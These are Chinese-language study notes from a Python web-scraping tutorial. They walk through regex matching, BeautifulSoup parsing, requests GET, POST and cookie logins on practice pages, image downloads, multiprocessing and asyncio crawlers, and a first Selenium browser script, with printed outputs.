    4
    5
    6
    7
    # 多行情况下
    string = """
    dog runs to cat.
    I run to dog.
    """
    print(re.search(r"^I", string))
    print(re.search(r"^I", string, flags=re.M)) # 增加 flag 匹配多行
    None<re.Match object; span=(18, 19), match='I'>
    0 或多次
    1
    2
    3
    # *: 出现 0 或多次都会被匹配
    print(re.search(r"ab*", "a"))
    print(re.search(r"ab*", "abbbbbbb"))
    <re.Match object; span=(0, 1), match='a'><re.Match object; span=(0, 8), match='abbbbbbb'>
    1 或多次
    1
    2
    3
    # +: 出现 1 或多次都会被匹配
    print(re.search(r"ab+", "a"))
    print(re.search(r"ab+", "abbbbbbb"))
    None<re.Match object; span=(0, 8), match='abbbbbbb'>
    可选次数
    1
    2
    3
    # {n,m}: 出现 n-m 次之间都会被匹配(逗号后面不能加空格)
    print(re.search(r"ab{2,10}", "a"))
    print(re.search(r"ab{2,10}", "abbbbb"))
    None<re.Match object; span=(0, 6), match='abbbbb'>
    group 组()
    1
    2
    3
    4
    5
    6
    # \d+ 数字出现了 1 次或多次
    # .+ 匹配所有除了\n 外所有的字符
    match = re.search(r"(\d+), Date: (.+)", "ID: 021523, Date: Feb/12/2017")
    print(match.group())
    print(match.group(1))
    print(match.group(2))
    021523, Date: Feb/12/2017021523Feb/12/2017
    组命名 ?P<组名>
    1
    2
    3
    4
    match = re.search(r"(?P<id>\d+), Date: (?P<date>.+)", "ID: 021523, Date: Feb/12/2017")
    print(match.group())
    print(match.group("id"))
    print(match.group("date"))
    021523, Date: Feb/12/2017021523Feb/12/2017
    findall 寻找所有匹配
    1
    2
    3
    4
    print(re.findall(r"r[ua]n", "run ran ren"))
    # | : 或
    print(re.findall(r"r(u|a)n", "run ran ren"))
    print(re.findall(r"run|ran", "run ran ren"))
    ['run', 'ran']['u', 'a']['run', 'ran']
    re.sub 替换
    1
    print(re.sub(r"r[au]ns", "catches", "dog runs to cat"))
    dog catches to cat
    re.split 分裂
    1
    print(re.split(r"[,;\.]", "a;b;c;d;e"))
    ['a', 'b', 'c', 'd', 'e']
    compile 先编译字符串
    1
    2
    3
    # compile
    compiled_re = re.compile(r"r[ua]n")
    print(compiled_re.search("dog ran to cat"))
    <re.Match object; span=(4, 7), match='ran'>
    小抄

    png

    使用正则表达式爬取网页标题
    1
    2
    3
    4
    5
    import re

    # 读取<title>和</title>之间的内容
    res = re.findall(r"<title>(.+?)</title>", html)
    print("\nPage title is: ", res[0])
    Page title is:  Scraping tutorial 1 | 莫烦 Python
    找到段落信息
    1
    2
    res = re.findall(r"<p>(.*?)</p>", html, flags=re.DOTALL)  # flags=re.DOTALL 选取多行信息
    print("\nPage paragraphs: ", res[0])
    Page paragraphs:  这是一个在 <a href="https://morvanzhou.github.io/">莫烦 Python</a><a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫教程</a> 中的简单测试.

    查找所有超链接信息
    1
    2
    res = re.findall(r'href="(.*?)"', html)
    print("\nAll links: ", res)
    All links:  ['https://morvanzhou.github.io/static/img/description/tab_icon.png', 'https://morvanzhou.github.io/', 'https://morvanzhou.github.io/tutorials/data-manipulation/scraping/']

    2.1 BeautifulSoup 解析网页: 基础

    Beautiful Soup 中文文档

    可以使用 BeautifulSoup 进行一个高级的匹配!

    1
    pip install beautifulsoup4
    Requirement already satisfied: beautifulsoup4 in c:\users\gzjzx\anaconda3\lib\site-packages (4.11.1)Requirement already satisfied: soupsieve>1.2 in c:\users\gzjzx\anaconda3\lib\site-packages (from beautifulsoup4) (2.3.1)Note: you may need to restart the kernel to use updated packages.

    BeautifulSoup 简单的用法

    导入网页信息
    1
    2
    3
    4
    5
    6
    7
    from bs4 import BeautifulSoup
    from urllib.request import urlopen

    html = urlopen(
    "https://yulizi123.github.io/static/scraping/basic-structure.html"
    ).read().decode('utf-8')
    print(html)
    <!DOCTYPE html><html lang="cn"><head><meta charset="UTF-8"><title>Scraping tutorial 1 | 莫烦 Python</title><link rel="icon" href="https://morvanzhou.github.io/static/img/description/tab_icon.png"></head><body><h1>爬虫测试 1</h1><p>这是一个在 <a href="https://morvanzhou.github.io/">莫烦 Python</a><a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫教程</a> 中的简单测试.</p></body></html>
    把获得的网页信息"喂给"BeautifulSoup
    1
    2
    3
    soup = BeautifulSoup(html, features='lxml')  # 解析形式: lxml
    print(soup.h1) # 选出 h1
    print('\n', soup.p) # 选出 p
    <h1>爬虫测试 1</h1> <p>这是一个在 <a href="https://morvanzhou.github.io/">莫烦 Python</a><a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫教程</a> 中的简单测试.</p>
    1
    2
    3
    all_href = soup.find_all('a')  # 找到所有<a>属性
    all_href = [l['href'] for l in all_href]
    print(all_href)
    ['https://morvanzhou.github.io/', 'https://morvanzhou.github.io/tutorials/data-manipulation/scraping/']
    1
    2
    all_href = soup.find_all('a')
    print(all_href)
    [<a href="https://morvanzhou.github.io/">莫烦 Python</a>, <a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫教程</a>]
    1
    2
    3
    all_href = soup.find_all('a')
    for l in all_href:
    print(l['href'])
    https://morvanzhou.github.io/https://morvanzhou.github.io/tutorials/data-manipulation/scraping/

    2.2 BeautifulSoup 解析网页: CSS

    1
    2
    3
    4
    5
    6
    7
    from bs4 import BeautifulSoup
    from urllib.request import urlopen

    html = urlopen(
    "https://yulizi123.github.io/static/scraping/list.html"
    ).read().decode('utf-8')
    print(html)
    <!DOCTYPE html><html lang="cn"><head><meta charset="UTF-8"><title>爬虫练习 列表 class | 莫烦 Python</title><style>.jan {background-color: yellow;}.feb {font-size: 25px;}.month {color: red;}</style></head><body><h1>列表 爬虫练习</h1><p>这是一个在 <a href="https://morvanzhou.github.io/" >莫烦 Python</a> 的 <a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/" >爬虫教程</a>里无敌简单的网页, 所有的 code 让你一目了然, 清晰无比.</p><ul><li class="month">一月</li><ul class="jan"><li>一月一号</li><li>一月二号</li><li>一月三号</li></ul><li class="feb month">二月</li><li class="month">三月</li><li class="month">四月</li><li class="month">五月</li></ul></body></html>
    1
    2
    3
    4
    5
    6
    soup = BeautifulSoup(html, features='lxml')
    # 用类名做匹配
    month = soup.find_all('li', {"class": "month"}) # 使用字典 查找<li>中 class 类中要包含 month 这个单词
    for m in month:
    print(m) # 如果只打印 m
    print(m.get_text()) # 显示里面的文字
    <li class="month">一月</li>一月<li class="feb month">二月</li>二月<li class="month">三月</li>三月<li class="month">四月</li>四月<li class="month">五月</li>五月
    1
    2
    jan = soup.find('ul', {"class": "jan"})
    print(jan)
    <ul class="jan"><li>一月一号</li><li>一月二号</li><li>一月三号</li></ul>
    1
    2
    3
    d_jan = jan.find_all('li')  # 将 jan 作为一个父对象
    for d in d_jan:
    print(d.get_text())
    一月一号一月二号一月三号

    2.3 BeautifulSoup 解析网页: 正则表达

    1
    2
    3
    4
    5
    6
    7
    8
    from bs4 import BeautifulSoup
    from urllib.request import urlopen
    import re

    html = urlopen(
    "https://yulizi123.github.io/static/scraping/table.html"
    ).read().decode('utf-8')
    print(html)
    <!DOCTYPE html><html lang="cn"><head><meta charset="UTF-8"><title>爬虫练习 表格 table | 莫烦 Python</title><style>img {width: 250px;}table{width:50%;}td{margin:10px;padding:15px;}</style></head><body><h1>表格 爬虫练习</h1><p>这是一个在 <a href="https://morvanzhou.github.io/" >莫烦 Python</a> 的 <a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/" >爬虫教程</a>里无敌简单的网页, 所有的 code 让你一目了然, 清晰无比.</p><br/><table id="course-list"><tr><th>分类</th><th>名字</th><th>时长</th><th>预览</th></tr><tr id="course1" class="ml"><td>机器学习</td><td><a href="https://morvanzhou.github.io/tutorials/machine-learning/tensorflow/">Tensorflow 神经网络</a></td><td>2:00</td><td><img src="https://morvanzhou.github.io/static/img/course_cover/tf.jpg"></td></tr><tr id="course2" class="ml"><td>机器学习</td><td><a href="https://morvanzhou.github.io/tutorials/machine-learning/reinforcement-learning/">强化学习</a></td><td>5:00</td><td><img src="https://morvanzhou.github.io/static/img/course_cover/rl.jpg"></td></tr><tr id="course3" class="data"><td>数据处理</td><td><a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫</a></td><td>3:00</td><td><img src="https://morvanzhou.github.io/static/img/course_cover/scraping.jpg"></td></tr></table></body></html>

    查找所有图片链接

    1
    2
    3
    4
    5
    soup = BeautifulSoup(html, features='lxml')

    img_links = soup.find_all("img", {"src": re.compile('.*?\.jpg')})
    for link in img_links:
    print(link['src'])
    https://morvanzhou.github.io/static/img/course_cover/tf.jpghttps://morvanzhou.github.io/static/img/course_cover/rl.jpghttps://morvanzhou.github.io/static/img/course_cover/scraping.jpg

    设定特定的匹配规则

    1
    2
    3
    4
    course_links = soup.find_all(
    'a', {'href': re.compile('https://morvan.*')})
    for link in course_links:
    print(link['href'])
    https://morvanzhou.github.io/https://morvanzhou.github.io/tutorials/data-manipulation/scraping/https://morvanzhou.github.io/tutorials/machine-learning/tensorflow/https://morvanzhou.github.io/tutorials/machine-learning/reinforcement-learning/https://morvanzhou.github.io/tutorials/data-manipulation/scraping/

    2.4 小练习: 爬百度百科

    设置源地址

    1
    2
    3
    4
    5
    6
    7
    from bs4 import BeautifulSoup
    from urllib.request import urlopen
    import re
    import random

    base_url = "https://baike.baidu.com"
    his = ["/item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711"]

    输出网址

    1
    2
    3
    4
    url = base_url + his[-1]  # 添加 his 列表中的最后一个, 合并成网址
    html = urlopen(url).read().decode('utf-8')
    soup = BeautifulSoup(html, features='lxml')
    print(soup.find('h1').get_text(), '\turl:', his[-1])
    网络爬虫 url: /item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711

    爬取链接

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    # 找到合法链接
    # 分析链接的规律: 所有超链接都有<a target=_blank href XXX
    # 以/item/开头
    sub_urls = soup.find_all("a", {"target": "_blank", "href": re.compile("/item/(%.{2})+$")})

    if len(sub_urls) != 0:
    his.append(random.sample(sub_urls, 1)[0]['href'])
    else:
    # 没有找到合法链接
    his.pop()
    print(his)
    ['/item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711', '/item/%E7%BD%91%E7%BB%9C%E6%95%B0%E6%8D%AE']

    加入循环

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    from bs4 import BeautifulSoup
    from urllib.request import urlopen
    import re
    import random

    base_url = "https://baike.baidu.com"
    his = ["/item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711"]

    for i in range(20): # 先爬 20 个
    url = base_url + his[-1] # 添加 his 列表中的最后一个, 合并成网址
    html = urlopen(url).read().decode('utf-8')
    soup = BeautifulSoup(html, features='lxml')
    print(soup.find('h1').get_text(), '\turl:', his[-1])

    sub_urls = soup.find_all("a", {"target": "_blank", "href": re.compile("/item/(%.{2})+$")})

    if len(sub_urls) != 0:
    his.append(random.sample(sub_urls, 1)[0]['href'])
    else:
    # 没有找到合法链接
    his.pop()
    print(his)
    网络爬虫 url: /item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711搜索引擎 url: /item/%E6%90%9C%E7%B4%A2%E5%BC%95%E6%93%8E百度 url: /item/%E7%99%BE%E5%BA%A6百度旅游 url: /item/%E7%99%BE%E5%BA%A6%E6%97%85%E6%B8%B8上地 url: /item/%E4%B8%8A%E5%9C%B0北至 url: /item/%E5%8C%97%E8%87%B3西京赋 url: /item/%E8%A5%BF%E4%BA%AC%E8%B5%8B缘竿 url: /item/%E7%BC%98%E7%AB%BF西京赋 url: /item/%E8%A5%BF%E4%BA%AC%E8%B5%8B扛鼎 url: /item/%E6%89%9B%E9%BC%8E任鄙 url: /item/%E4%BB%BB%E9%84%99孟说 url: /item/%E5%AD%9F%E8%AF%B4乌获 url: /item/%E4%B9%8C%E8%8E%B7秦国 url: /item/%E7%A7%A6%E5%9B%BD雍城 url: /item/%E9%9B%8D%E5%9F%8E秦德公 url: /item/%E7%A7%A6%E5%BE%B7%E5%85%AC秦宪公 url: /item/%E7%A7%A6%E5%AE%81%E5%85%AC秦静公 url: /item/%E7%A7%A6%E9%9D%99%E5%85%AC秦文公 url: /item/%E7%A7%A6%E6%96%87%E5%85%AC宝鸡 url: /item/%E5%AE%9D%E9%B8%A1%E5%B8%82['/item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711', '/item/%E6%90%9C%E7%B4%A2%E5%BC%95%E6%93%8E', '/item/%E7%99%BE%E5%BA%A6', '/item/%E7%99%BE%E5%BA%A6%E6%97%85%E6%B8%B8', '/item/%E4%B8%8A%E5%9C%B0', '/item/%E5%8C%97%E8%87%B3', '/item/%E8%A5%BF%E4%BA%AC%E8%B5%8B', '/item/%E6%89%9B%E9%BC%8E', '/item/%E4%BB%BB%E9%84%99', '/item/%E5%AD%9F%E8%AF%B4', '/item/%E4%B9%8C%E8%8E%B7', '/item/%E7%A7%A6%E5%9B%BD', '/item/%E9%9B%8D%E5%9F%8E', '/item/%E7%A7%A6%E5%BE%B7%E5%85%AC', '/item/%E7%A7%A6%E5%AE%81%E5%85%AC', '/item/%E7%A7%A6%E9%9D%99%E5%85%AC', '/item/%E7%A7%A6%E6%96%87%E5%85%AC', '/item/%E5%AE%9D%E9%B8%A1%E5%B8%82', '/item/%E7%BA%A2%E6%B2%B3%E8%B0%B7']

    在此建议大家, 因为有反爬虫机制, 大家最好给自己的程序加上 time.sleep(2), 不然你的程序也不能访问百度百科了

    3.1 Post 登录 Cookies(Requests)

    其实在加载网页的时候, 有几种类型, 而这几种类型就是你打开网页的关键. 最重要的类型 (method) 就是 getpost (当然还有其他的, 比如 head, delete). 刚接触网页构架的朋友可能又会觉得有点懵逼了. 这些请求的方式到底有什么不同? 他们又有什么作用?

    我们就来说两个重要的, get, post, 95% 的时间, 你都是在使用这两个来请求一个网页.

    post
    账号登录
    搜索内容
    上传图片
    上传文件
    往服务器传数据 等

    get
    正常打开网页
    不往服务器传数据

    安装 requests

    1
    pip install requests
    Requirement already satisfied: requests in c:\users\gzjzx\anaconda3\lib\site-packages (2.27.1)Requirement already satisfied: charset-normalizer~=2.0.0 in c:\users\gzjzx\anaconda3\lib\site-packages (from requests) (2.0.4)Requirement already satisfied: idna<4,>=2.5 in c:\users\gzjzx\anaconda3\lib\site-packages (from requests) (3.3)Requirement already satisfied: certifi>=2017.4.17 in c:\users\gzjzx\anaconda3\lib\site-packages (from requests) (2021.10.8)Requirement already satisfied: urllib3<1.27,>=1.21.1 in c:\users\gzjzx\anaconda3\lib\site-packages (from requests) (1.26.9)Note: you may need to restart the kernel to use updated packages.

    使用 requests

    get 请求
    1
    2
    3
    4
    5
    6
    7
    import requests
    # import webbrowser

    param = {"wd": "莫烦 python"}
    r = requests.get('http://www.baidu.com/s', params=param)
    print(r.url)
    # webbrowser.open(r.url) # 打开这个网页: 使用百度搜索 莫烦 python
    http://www.baidu.com/s?wd=%E8%8E%AB%E7%83%A6python
    post 请求

    https://pythonscraping.com/pages/files/form.html

    1
    2
    3
    data = {'firstname': '莫烦', 'lastname': '周'}
    r = requests.post('https://pythonscraping.com/pages/files/processing.php', data=data)
    print(r.text)
    Hello there, 莫烦 周!

    使用 get 请求会返回信息, 而 post 请求不会

    上传文件

    https://pythonscraping.com/files/form2.html

    上传图片也是post的一种

    1
    2
    3
    4
    file = {'uploadFile': open('./images.png', 'rb')}
    r = requests.post(
    'https://pythonscraping.com/pages/files/processing2.php', files=file)
    print(r.text)
    uploads/images.pngThe file image.png has been uploaded.
    登录

    https://pythonscraping.com/pages/cookies/login.html

    1
    2
    3
    4
    5
    6
    7
    8
    payload = {'username': 'Morvan', 'password': 'password'}
    r = requests.post(
    'https://pythonscraping.com/pages/cookies/welcome.php',
    data=payload)
    print(r.cookies.get_dict()) # 网页的 cookie 内容
    r = requests.get('https://pythonscraping.com/pages/cookies/profile.php'
    ,cookies=r.cookies)
    print(r.text)
    {'loggedin': '1', 'username': 'Morvan'}Hey Morvan! Looks like you're still logged into the site!
    1
    2
    3
    4
    5
    6
    session = requests.Session()
    payload = {'username': 'Morvan', 'password': 'password'}
    r = session.post('https://pythonscraping.com/pages/cookies/welcome.php', data=payload)
    print(r.cookies.get_dict())
    r = session.get("https://pythonscraping.com/pages/cookies/welcome.php")
    print(r.text)
    {'loggedin': '1', 'username': 'Morvan'}<h2>Welcome to the Website!</h2>You have logged in successfully! <br/><a href="profile.php">Check out your profile!</a>

    3.2 下载文件

    设置保存路径和图片地址

    1
    2
    3
    4
    import os

    os.makedirs('./img/', exist_ok=True) # 设置保存路径
    IMAGE_URL = "http://www.baidu.com/img/flexible/logo/pc/result.png" # 设置图片地址

    urlretrive url 检索

    1
    2
    3
    from urllib.request import urlretrieve

    urlretrieve(IMAGE_URL, './img/images1.png')
    ('./img/images1.png', <http.client.HTTPMessage at 0x27e707a86a0>)

    使用 requests

    wb 是二进制格式打开一个文件, 源文件存在的话从头编辑, 替代原文件, 不存在的话则创建新文件

    1
    2
    3
    4
    5
    import requests

    r = requests.get(IMAGE_URL)
    with open('./img/images2.png', 'wb') as f:
    f.write(r.content)

    如果要下载一个较大的文件

    1
    2
    3
    4
    r = requests.get(IMAGE_URL, stream=True)
    with open('./img/images3.png', 'wb') as f:
    for chunk in r.iter_content(chunk_size=32): # 每次写入文件时写入 32 个字节
    f.write(chunk)

    3.3 小练习: 下载国家地理美图

    每日一图-地理中文网—《国家地理》杂志中文网站

    好像网站更新了, 有了反爬虫功能? 改成爬取February 27, 2018 | iDaily 每日环球视野

    设置地址

    1
    2
    3
    4
    from bs4 import BeautifulSoup
    import requests

    URL = "http://m.idai.ly/se/a193iG?1661356800"

    设置爬虫参数

    png

    注意到图片都放在 div class="photo"的父对象中

    1
    2
    3
    html = requests.get(URL).text
    soup = BeautifulSoup(html, 'lxml')
    img_ul = soup.find_all('div', {'class': 'photo'})
    1
    img_ul
    [<div class="photo"><img src="http://pic.yupoo.com/fotomag/H9yil7z0/TaRLX.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/757ee474/10530738.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/946704b4/66933a50.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/7aa989ff/b4882755.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/cb529779/d8c7a395.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/2e45a0cd/85b8cc7b.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/e1989816/20e2ebdc.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/42034c62/e67c02ab.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/267e386a/88c891b6.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/65ad43ae/e5d8c29e.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/1213e2a1/3faaaedd.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/d009c863/b6f97eca.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/76c66979/84fa84fa.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/9023854c/619b3b2e.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/8a75067c/2a3ecbf9.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/30e65430/a1f9a680.jpg"/><div class="overlay"></div></div>]

    设置保存文件夹

    1
    2
    3
    import os

    os.makedirs('./img/', exist_ok=True)

    下载

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    for ul in img_ul:
    imgs = ul.find_all('img')
    for img in imgs:
    url = img['src']
    r = requests.get(url, stream=True)
    image_name = url.split('/')[-1]
    with open('./img/%s' % image_name, 'wb') as f:
    for chunk in r.iter_content(chunk_size=128):
    f.write(chunk)
    print('Saved %s' % image_name)
    Saved TaRLX.jpgSaved 10530738.jpgSaved 66933a50.jpgSaved b4882755.jpgSaved d8c7a395.jpgSaved 85b8cc7b.jpgSaved 20e2ebdc.jpgSaved e67c02ab.jpgSaved 88c891b6.jpgSaved e5d8c29e.jpgSaved 3faaaedd.jpgSaved b6f97eca.jpgSaved 84fa84fa.jpgSaved 619b3b2e.jpgSaved 2a3ecbf9.jpgSaved a1f9a680.jpg

    得到爬取的文件:

    png

    4.1 多进程分布式爬虫

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    import multiprocessing as mp
    import time
    from urllib.request import urlopen, urljoin
    from bs4 import BeautifulSoup
    import re

    base_url = "https://mofanpy.com/"

    # 不要持续爬取一个网站的信息, 否则你可能再也登陆不上这个网页
    if base_url != "https://127.0.0.1:4000/": # 如果用外网, 就限制爬取
    restricted_crawl = True
    else:
    restricted_crawl = False

    定义爬取的函数

    1
    2
    3
    4
    def crawl(url):
    response = urlopen(url)
    time.sleep(0.1) # 对下载作一个轻微延迟: 0.1 秒
    return response.read().decode()

    解析

    1
    2
    3
    4
    5
    6
    7
    8
    def parse(html):
    soup = BeautifulSoup(html, 'lxml')
    urls = soup.find_all('a', {'href': re.compile('^/.+?$')})
    title = soup.find('h1').get_text().strip()
    # set() 函数创建一个无序不重复元素集,可进行关系测试,删除重复数据,还可以计算交集、差集、并集等。
    page_urls = set([urljoin(base_url, url['href']) for url in urls])
    url = soup.find('meta', {'property': 'og:url'})['content']
    return title, page_urls, url

    常规方式爬取

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    unseen = set([base_url,])
    seen = set()

    count, t1 = 1, time.time()

    while len(unseen) != 0:
    if restricted_crawl and len(seen) > 20:
    break

    print('\nDistributed Crawling...')
    htmls = [crawl(url) for url in unseen]

    print('\nDistributed Parsing...')
    results = [parse(html) for html in htmls]

    print('\nAnalysing...')
    seen.update(unseen)
    unseen.clear()

    for title, page_urls, url in results:
    print(count, title, url)
    count += 1
    unseen.update(page_urls - seen)
    print('Total time: %.1f s' % (time.time() - t1, ))
    Distributed Crawling...Distributed Parsing...Analysing...1 莫烦 Python 主页 http://mofanpy.com/Distributed Crawling...Distributed Parsing...Analysing...2 数据处理 http://mofanpy.com/tutorials/data-manipulation3 有趣的机器学习 http://mofanpy.com/tutorials/machine-learning/ML-intro/4 机器学习 http://mofanpy.com/tutorials/machine-learning5 Python 基础教学 http://mofanpy.com/tutorials/python-basic6 其他效率教程 http://mofanpy.com/tutorials/othersDistributed Crawling...Distributed Parsing...Analysing...7 Numpy 数据怪兽 http://mofanpy.com/tutorials/data-manipulation/numpy8 Matplotlib 画图 http://mofanpy.com/tutorials/data-manipulation/plt9 交互式学 Python http://mofanpy.com/tutorials/python-basic/interactive-python/10 进化算法 (Evolutionary-Algorithm) http://mofanpy.com/tutorials/machine-learning/evolutionary-algorithm/11 强化学习 (Reinforcement Learning) http://mofanpy.com/tutorials/machine-learning/reinforcement-learning/12 自然语言处理 http://mofanpy.com/tutorials/machine-learning/nlp/13 数据的伙伴 Pandas http://mofanpy.com/tutorials/data-manipulation/pandas14 窗口视窗 (Tkinter) http://mofanpy.com/tutorials/python-basic/tkinter/15 有趣的机器学习 http://mofanpy.com/tutorials/machine-learning/ML-intro16 PyTorch http://mofanpy.com/tutorials/machine-learning/torch/17 Keras http://mofanpy.com/tutorials/machine-learning/keras/18 SciKit-Learn http://mofanpy.com/tutorials/machine-learning/sklearn/19 Theano http://mofanpy.com/tutorials/machine-learning/theano/20 多线程 (Threading) http://mofanpy.com/tutorials/python-basic/threading/21 多进程 (Multiprocessing) http://mofanpy.com/tutorials/python-basic/multiprocessing/22Linux 简易教学 http://mofanpy.com/tutorials/others/linux-basic/23 Tensorflow http://mofanpy.com/tutorials/machine-learning/tensorflow/24 生成模型 GAN 网络 http://mofanpy.com/tutorials/machine-learning/gan/25 Git 版本管理 http://mofanpy.com/tutorials/others/git/26 机器学习实战 http://mofanpy.com/tutorials/machine-learning/ML-practice/27 网页爬虫 http://mofanpy.com/tutorials/data-manipulation/scrapingTotal time: 7.4s

    多进程爬取

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    unseen = set([base_url,])
    seen = set()

    pool = mp.Pool(4)
    count, t1 = 1, time.time()
    while len(unseen) != 0:
    if restricted_crawl and len(seen) > 20:
    break
    print('\nDistributed Crawling...')
    crawl_jobs = [pool.apply_async(crawl, args=(url,)) for url in unseen]
    html = [j.get() for j in crawl_jobs]

    print('\nDistributed Parsing...')
    parse_jobs = [pool.apply_async(parse, args=(html,)) for html in htmls]
    results = [j.get() for j in parse_jobs]

    print('\nAnalysing...')
    seen.update(unseen)
    unseen.clear()

    for title, page_urls, url in results:
    print(count, title, url)
    count += 1
    unseen.update(page_urls - seen)
    print('Total time: %.1f s' % (time.time() - t1, ))
    Distributed Crawling...

    4.2 加速爬虫: 异步加载 Asyncio

    之前我一直在想如何用 multiprocessing 或者 threading 加速我的爬虫, 也做过了一些小实验, 确实, 我们看到了不小的效率提升. 但是当我更加深入的时候, 我发现, Python 还提供了一个有力的工具, 叫做 asyncio. 这是一个仅仅使用单线程, 就能达到多线程/进程的效果的工具.

    它的原理, 简单说就是: 在单线程里使用异步计算, 下载网页的时候和处理网页的时候是不连续的, 更有效利用了等待下载的这段时间.

    那么, 我们今天就来尝试使用 asyncio 来替换掉 multiprocessing 或者 threading, 看看效果如何.

    png

    常规

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    import time


    def job(t):
    print('Start job', t)
    time.sleep(t)
    print('Job', t, 'takes', t, 's')


    def main():
    [job(t) for t in range(1, 3)]


    t1 = time.time()
    main()
    print('NO async total time: ', time.time() - t1)
    Start job 1Job 1 takes 1sStart job 2Job 2 takes 2sNO async total time:  3.010831594467163

    asyncio

    jupyter 对异步的支持不是特别好, 换 pycharm

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    import time
    import asyncio


    async def job(t): # async 形式的功能
    print('Start job ', t)
    await asyncio.sleep(t) # 等待 "t" 秒, 期间切换其他任务
    print('Job ', t, ' takes ', t, ' s')


    async def main(loop): # async 形式的功能
    tasks = [
    loop.create_task(job(t)) for t in range(1, 3)
    ] # 创建任务, 但是不执行
    await asyncio.wait(tasks) # 执行并等待所有任务完成


    t1 = time.time()
    loop = asyncio.get_event_loop() # 建立 loop
    loop.run_until_complete(main(loop)) # 执行 loop
    loop.close() # 关闭 loop
    print("Async total time : ", time.time() - t1)
    Start job  1Start job  2Job  1  takes  1sJob  2  takes  2sAsync total time :  2.019124984741211

    常规方式爬取信息

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    import requests

    URL = 'https://mofanpy.com/'


    def normal():
    for i in range(2):
    r = requests.get(URL)
    url = r.url
    print(url)

    t1 = time.time()
    normal()
    print("Normal total time:", time.time() - t1)
    https://mofanpy.com/https://mofanpy.com/Normal total time: 0.26386022567749023

    使用 asyncio

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    import aiohttp
    import time
    import asyncio

    URL = 'https://mofanpy.com/'

    async def job(session):
    response = await session.get(URL) # 等待并切换
    return str(response.url)


    async def main(loop):
    async with aiohttp.ClientSession() as session: # 官网推荐建立 Session 的形式
    tasks = [loop.create_task(job(session)) for _ in range(2)]
    finished, unfinished = await asyncio.wait(tasks)
    all_results = [r.result() for r in finished] # 获取所有结果
    print(all_results)

    t1 = time.time()
    loop = asyncio.get_event_loop()
    loop.run_until_complete(main(loop))
    loop.close()
    print("Async total time:", time.time() - t1)
    ['https://mofanpy.com/', 'https://mofanpy.com/']Async total time: 0.1562364101409912

    5.1 高级爬虫: 让 Selenium 控制你的浏览器帮你爬

    那么你什么时候会要用到 Selenium 呢? 当你:

    • 发现用普通方法爬不到想要的内容
    • 网站跟你玩捉迷藏, 太多 JavaScript 内容
    • 需要像人一样浏览的爬虫

    这个插件能让你记录你使用浏览器的操作. 我以前玩网游, 为了偷懒, 用过一个叫按键精灵的东西, 帮我做了很多重复性的工作, 拯救了我的鼠标和键盘, 当然还有我的手指! 看着别人一直在点鼠标, 我心中暗爽~ 这个 Katalon Recorder 插件 + Selenium 就和按键精灵是一个意思. 记录你的操作, 然后你可以让电脑重复上千遍.

    每当你点击的时候, 插件就会记录下你这些点击, 形成一些 log. 最后神奇的事情将要发生. 你可以点击 Export 按钮, 观看到帮你生成的浏览记录代码!

    png

    png

    安装

    selenium + Edge 浏览器_tk1023 的博客-CSDN 博客_edge selenium

    “Hello world”

    1
    2
    3
    4
    5
    6
    7
    8
    9
    from time import sleep
    from selenium import webdriver

    driver = webdriver.Edge() # 打开 Edge 浏览器

    driver.get(r'https://www.baidu.com/') # 打开 https://www.baidu.com/

    sleep(5) # 5 秒后
    driver.close() # 关闭浏览器

    Python 控制浏览器

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
